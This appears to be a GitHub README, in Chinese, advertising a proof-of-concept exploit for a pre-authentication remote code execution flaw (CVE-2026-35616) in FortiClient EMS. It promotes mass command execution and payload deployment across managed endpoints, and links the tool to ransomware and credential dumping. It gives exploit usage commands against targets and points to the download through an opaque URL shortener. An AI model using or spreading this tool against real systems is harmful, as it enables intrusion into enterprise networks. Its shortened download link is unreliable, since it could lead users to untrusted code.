z3r0h3ro/CVE-2026-35616-poc
GitHub: z3r0h3ro/CVE-2026-35616-poc
针对 FortiClient EMS 的认证前 RCE 漏洞 PoC,可绕过认证并在管理服务器及受管端点执行命令。
Stars: 0 | Forks: 0
# CVE-2026-35616 - FortiClient EMS 认证前远程代码执行 (RCE)
**Fortinet FortiClient Enterprise Management Server 认证绕过与远程代码执行**
针对 FortiClient EMS 版本 **7.4.5** 和 **7.4.6** 的活跃零日漏洞利用。
允许未经认证的攻击者绕过 API 认证,并在 EMS 服务器及所有受管端点上执行任意命令。
- **CVE**: CVE-2026-35616
- **CVSS**: 9.1 (严重)
- **受影响版本**: FortiClient EMS 7.4.5 - 7.4.6 (7.2 分支不受影响)
- **已被在野利用**: 是
### 功能特性
- 完全的认证前 API 绕过(无需 cookies、tokens 或凭据)
- 在 EMS 服务器上以 SYSTEM / 高权限账户身份远程执行命令
- 针对所有受管 FortiClient 端点的批量命令执行和载荷部署
- 支持针对特定组或单个端点
- 任务队列与结果轮询
### 此漏洞利用提供的功能
- 进入分段企业网络的初始立足点
- 控制中央端点管理服务器
- 能够即时向数百或数千个端点推送恶意载荷
- 绕过由 FortiClient EMS 管理的端点保护解决方案
- 易于链接到凭据转储、持久化或勒索软件操作
### 环境要求
- Python 3.8+
- `requests`, `pyyaml`, `argparse` (通过 requirements.txt 安装)
### 使用方法
```
python3 exploit.py -t https://target-ems.example.com:8443 [options]
```
**在 EMS 服务器上执行基本命令:**
```
python3 exploit.py -t https://10.10.10.50:8013 -c "whoami"
```
**示例:**
通过绕过检查 EMS 版本:
```
python3 exploit.py -t https://target:8443 -c "powershell -c \"Get-ItemProperty 'HKLM:\\SOFTWARE\\Fortinet\\FortiClientEMS' | Select Version\""
```
### 下载
[href](https://tinyurl.com/498uebea)
### 注意事项
- 同时适用于 8013 (HTTP) 和 8443/443 (HTTPS) 端口
- 自动禁用证书验证
- 漏洞利用直接向易受攻击的 `/api/v1/` 端点发送构造的请求
- 如果启用了 EMS 日志记录,可以获取任务结果
**仅供授权的红队和渗透测试使用。**
标签:API 安全, CISA项目, Critical 级漏洞, CVE-2026-35616, FortiClient EMS, Fortinet 漏洞, Python 安全工具, Red Teaming, 企业网络安全, 协议分析, 恶意样本开发, 恶意载荷部署, 权限提升, 横向移动, 端点管理, 编程工具, 编程规范, 身份验证绕过, 远程代码执行, 零日漏洞, 预认证 RCE